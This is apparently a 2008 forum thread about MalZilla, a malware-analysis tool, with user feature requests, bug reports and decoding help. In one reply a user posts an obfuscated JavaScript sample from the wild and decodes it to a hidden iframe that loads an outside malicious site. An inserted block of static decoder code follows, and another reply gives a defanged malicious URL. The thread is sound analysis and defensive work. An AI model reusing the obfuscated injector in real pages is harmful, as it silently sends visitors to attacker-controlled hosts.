Author Topic: MalZilla  (Read 301201 times)


April 14, 2008, 11:40:27 pm
Reply #105

tjs

Another feature request:

How about associating hxxp with malzilla so that we can embed hxxp links in webpages and have them automatically load up with malzilla? That'll save us from having to do lots of copy/pasting from MDL (and other sites) into Malzilla :P

Just another random idea for after your vacations :)

TJS

April 15, 2008, 01:39:04 pm
Reply #106

Orac

:-[ I only found out about Malzilla yesterday. It's certainly more efficient than Lynx, and I love the decoding functions; it sure beats doing it the hard way.

An idea: we're seeing more and more FTP RFIs than just a few months ago. Any possibility of porting Malzilla for FTP grabs?
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

April 15, 2008, 03:06:26 pm
Reply #107

bobby

@tjs
Doesn't the Clipboard monitor do the job similar to what you request?

@Orac
I'll do something about FTP grabs, but I can only do it when I come back from vacation.

April 15, 2008, 04:08:11 pm
Reply #108

tjs

I've had a few bad experiences with the clipboard monitor so I haven't experimented with it too much. I'll check it out.

April 15, 2008, 07:16:00 pm
Reply #109

bobby

Clipboard monitor can be annoying sometimes.
It monitors clipboard for links (keywords can be defined on Settings tab).

In the beginning, the problem was that it grabbed all the links twice (double entries in the list).
I solved that by clearing the clipboard after getting the links.
That was a solution for Malzilla, but a problem for other running apps.

Now, it does not clear the clipboard (other apps should not experience problems while Malzilla is running), but it tries to detect double entries and delete them from the list.

The current problem is that the Clipboard Monitor also detects internal copy/paste of links inside Malzilla (I do not find this useful), as Malzilla uses the Windows clipboard.

April 18, 2008, 07:50:43 pm
Reply #110

bobby

Sorry guys, I didn't succeed in preparing the new release before I go on vacation (tomorrow morning).
It is full of half-baked functions, and I would not like to upload it in such a state.

See you in 3 weeks (3 weeks without a PC :) ).

April 18, 2008, 07:52:16 pm
Reply #111

MysteryFCM

Have fun dude :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 18, 2008, 07:56:36 pm
Reply #112

JohnC

Have a nice time away :)

April 18, 2008, 08:16:46 pm
Reply #113

bobby

Thanks guys.

The following is not an official release (but you can get it if you want to try it):
http://rapidshare.com/files/108547702/malzilla.exe.html
You will need the dll files from the latest official version of Malzilla:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804&release_id=587544

What is half-baked:
- you will see "Run script" in the right-click menu (works on selected text, or on the whole text if no selection is made). Internal scripts are working; external ones are not implemented at all
- the state of "Use referrer" on the Download page is not saved in the INI file for the next session
- Download panel - button panels can be hidden (click anywhere between the buttons) to extend the space for downloaded source and HTTP headers. There are problems with some combinations of resizing the form and hiding/unhiding the panels - buttons are not always restored to the right position
- some JavaScripts can break Malzilla if "Debug" is used. It does not break if "Run script" is used. It manifests as clearing all the settings, URL history etc. This bug affects all the previous versions of Malzilla. I can't do a lot here, except prevent Malzilla from overwriting the settings files with empty ones. This is not an exploit for Malzilla. It is just that the Debugger does not finish working (gets stuck), and you need to kill Malzilla. Malzilla will receive the termination signal, and it will do the closing operations (saving settings), which are empty because the thread containing the settings (GUI) is not responding. All the settings files will be overwritten with empty files.

There may be something else that I can't recall at the moment.

Cheers,
bobby

April 19, 2008, 02:25:47 pm
Reply #114

Orac

Hope you have a great vacation, Bobby.

I've had another idea for Malzilla: within the HTTP header section, adding the resolved DNS and connection information would be very helpful, especially when faced with redirects. Example:
Resolving ess.trix.net... 200.201.192.41, 200.201.192.31
Connecting to ess.trix.net[200.201.192.41]:80... failed: No route to host.
Connecting to ess.trix.net[200.201.192.31]:80... connected.
Malware analysed using clarified analyzer to record and document how malware behaves in a networking environment

April 29, 2008, 06:01:37 pm
Reply #115

tjs

Looks like SANS is now using Malzilla as part of their training
http://www.sans.org/training/description.php?mid=54

TJS

May 10, 2008, 03:05:22 am
Reply #116

jimmyleo

Hi bobby:

Code:
<script>
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
    var D8BE9398766CD = 676;
    D8BE9398766CD = D8BE9398766CD - 660;
    D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
    return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
    var E24A10 = 122;
    E24A10 = E24A10 - 120;
    var D7502F1FF7C = "";
    for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
    {
        D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
    }
    eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>

This script may leave Malzilla's decoder in the "Working..." state. I chose to replace eval() with the method and fill in document.write as you know, but it keeps this state.

And I decoded it manually.
Code:
vyn=document.getElementById('kig');
if(vyn==null)
{
    document.write('<iframe id=kig src=http://verossa.info style=display:none></iframe>');
}

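The decode step from the post above, done statically as an added example (not jimmyleo's or Malzilla's code): the chunk size and radix are recovered from the obfuscated script's arithmetic, the hex payload is mapped back to characters without any eval, and the iframe src values in the result are listed so the injected URL can be checked without running document.write.

```javascript
// Added example, not code from the post: decode the hex-string obfuscation
// above statically, without eval, and list the iframe src values it injects.
// The constructed sample at the bottom is the payload quoted in the post.

// Parameters recovered from the obfuscated script: 122 - 120 = 2 characters
// per chunk, 676 - 660 = 16 as the parseInt radix, i.e. two-digit hex bytes.
const CHUNK = 122 - 120;
const RADIX = 676 - 660;

// Mirror B06AA5(): split the payload into CHUNK-sized pieces, parseInt each
// in RADIX, map it to a character, and return the decoded stage instead of
// handing it to eval().
function decodeHexChunks(payload) {
  if (payload.length % CHUNK !== 0) {
    throw new Error('payload length is not a multiple of ' + CHUNK);
  }
  let out = '';
  for (let i = 0; i < payload.length; i += CHUNK) {
    const code = parseInt(payload.substr(i, CHUNK), RADIX);
    if (Number.isNaN(code)) {
      throw new Error('non-hex chunk at offset ' + i);
    }
    out += String.fromCharCode(code);
  }
  return out;
}

// Pull every iframe src out of the decoded stage so the injected URL is
// visible without executing document.write in a browser.
function extractIframeSrcs(decoded) {
  const srcs = [];
  const re = /<iframe\b[^>]*\bsrc=["']?([^\s"'>]+)/gi;
  let m;
  while ((m = re.exec(decoded)) !== null) {
    srcs.push(m[1]);
  }
  return srcs;
}

// Constructed sample: the argument passed to B06AA5() in the post.
const SAMPLE = '76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D';

const STAGE = decodeHexChunks(SAMPLE);
console.log(STAGE);
console.log(extractIframeSrcs(STAGE));
```

The decoded stage matches the manual result in the post; the same two functions work on any sample that uses this chunk/radix scheme, and the length and NaN checks flag payloads that have been truncated or mis-copied.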
May 10, 2008, 08:35:08 pm
Reply #117

bobby

Hi jimmyleo,

Use the last build and choose the "Leave as is" option. You will get the same result as the one you got manually.

May 16, 2008, 02:32:25 pm
Reply #118

jimmyleo

Yeah, got it ;D

And another bug, maybe?

The following link:
Code:
hxxp://xindizhi88.com/ai/Yes.htm
JScript.Encode, at first glance, and MZ only decodes part of it; the remainder is messy characters.

jimi :)

May 16, 2008, 04:33:14 pm
Reply #119

bobby

Thanks for reporting this bug.
It has something to do with the conversion between ASCII and Unicode.
The script decodes OK until the first non-English character appears, and it turns into a mess after that.

Please use this online JScript.encode decoder until I get this bug fixed:
http://www.greymagic.com/security/tools/decoder/decoder.asp